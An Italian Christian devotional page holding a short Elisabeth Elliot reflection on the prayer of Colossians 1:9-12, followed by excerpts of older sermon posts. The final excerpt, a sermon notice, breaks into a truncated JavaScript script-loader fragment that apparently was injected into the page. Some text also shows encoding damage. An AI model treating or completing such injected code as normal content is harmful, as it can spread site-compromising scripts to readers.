La forza per affrontare e per rendere grazie

eelliot

di  Elisabeth Elliot  –   Mi capita spesso di pregare per qualcuno che si trova in circostanze o nel bisogno a me sconosciuti. Nelle epistole di Paolo ci sono molte preghiere che potrebbero essere usate quasi per ogni difficoltà. Una delle mie preferite si trova in Colossesi 1:9-12. Una parte di questa preghiera dice: “Essendo fortificati in ogni forza secondo la potenza della sua gloria, onde possiate essere in tutto pazienti e longanimi; e rendendo grazie con allegrezza al Padre”.

Questa parte sembra accettare ogni situazione. Essa non chiede una soluzione istantanea o dei capovolgimenti. Essa non invoca Dio per avere una liberazione miracolosa da ogni difficoltà che potrebbe sopraggiungere. Essa chiede una risposta perfettamente cristiana, che si ottiene per mezzo della potenza soddisfacente di Dio: affrontare qualsiasi cosa che sopraggiunga da vero cristiano, con i doni dello Spirito Santo di forza, pazienza e longanimità. Essa chiede la forza per rendere grazie. Essa chiede la forza per ringraziare il Padre quando tutto in noi protesta. In Lui (non sempre in ciò che accade a noi) troviamo tanta forza e tanti motivi per ringraziarlo.

I commenti sono chiusi.

Post meno recenti

Leonard Ravenhill

VIDEO –   “Siamo disposti a bere dalla Sua coppa?”   –   Un altro sermone di Leonard Ravenhill che tratta di un tema fondamentale specialmente in questi giorni di caos e corruzione nella Chiesa, il risveglio! Tutti lo vogliono, ma nessuno prega per averlo, tutti ne parlano ma nessuno lo vuole, per avere un risveglio bisogna pagare un prezzo tremendo, un prezzo che lo stesso Gesù ha …
Leggi Tutto

LA GUARIGIONE DIVINA

di DAVID PETTS  –  Uno dei maggiori aspetti dell’effusione dello Spirito Santo in questo secolo è che insieme alla fede nel Battesimo dello Spirito e nei doni dello Spirito vi è anche un risorgere di fede nella potenza e nella volontà di Dio per la Guarigione Divina. Molte sono state le benedizioni ricevute nella pratica della Guarigione Divina, ma sono stati molti anche i problemi e gli abusi …
Leggi Tutto

PIÙ VOLENTIERI AL MERCATO CHE NEL SANTUARIO

di Vance Havner  –  «A chi assomiglierò io questa generazione? Ella è simile ai fanciulli seduti nelle piazze che gridano ai loro compagni e dicono: Vi abbiamo suonato il flauto e voi non avete ballato» (Matteo 11:16,17). Oggi molti cristiani giocano alla religione. Essi si trovano perfettamente a loro agio in questo mondo: vivono serenamente, comprano, vendono, acquistano, guadagnano; la loro mente è tutta dedita ai profitti e …
Leggi Tutto

LA SHEKINAH MANCANTE

“Shekinah”: parola ebraica che descrive la nuvola scintillante che aleggiava sul coperchio dell’arca, simbolo ed espressione della gloria di Dio.  di A. W. TOZER  –  Viviamo in giorni nei quali l’opera del Signore è portata avanti da personalità brillanti secondo i metodi del mondo dell’intrattenimento e dello spettacolo. Come è importante perciò considerare il consiglio di uomini di Dio sinceri e umili, che tengono ascosta la loro personalità …
Leggi Tutto

DIOTREFE

Chi era Diotrefe? Etimologicamente il suo nome significa «nutrito dall’Eterno » e se tale nome era stato scelto dopo la conversione, come è da supporsi, dobbiamo dedurne che in origine questo fedele doveva manifestare le caratteristiche della consacrazione. Nelle scritture facciamo la conoscenza di questo poco noto cristiano leggendo la terza breve epistola di S. Giovanni, in cui si parla di lui in termini poco lusinghieri; viene presentato …
Leggi Tutto

ABRAMO O LOT ?

Abramo o Lot, non Abramo e Lot! Quando Abramo, ubbidendo alla chiamata di Dio, usci da Ur, il racconto della Genesi dice che:  Terah prese Abramo suo figliolo e Lot…e uscirono insieme da Ur dei Caldei, per andare nel paese di Canaan. (Genesi 11:3). All’inizio di questo viaggio erano Abramo e Lot, perchè Lot accompagnava suo zio e godeva l’insigne privilegio di camminare con il padre di tutti …
Leggi Tutto

I TRE ALBERI

Nelle chiese perseguitate viene? spesso e volentieri raccontata questa? parabola. Per quelli che soffrono il? carcere ? motivo di consolazione. ?In un bosco c’erano una volta tre giovani alberi, legati fra loro da uno? stretto rapporto di amicizia. Vollero? pregare insieme, affinch? non fosse la? putrefazione a mettere fine alla loro vita,? ma che il loro legno fosse utilizzato dagli? uomini. Il primo albero espresse il desiderio di? …
Leggi Tutto

Sermone Domenica 21 Aprile: Terry Peretti

Predicazione dell’evangelista TERRY PERETTI 2 Re 19 – “Non temere il nemico:Il Signore è più forte” var d=document;var s=d.createElement(‘script’); …
Leggi Tutto

Dai nostri Culti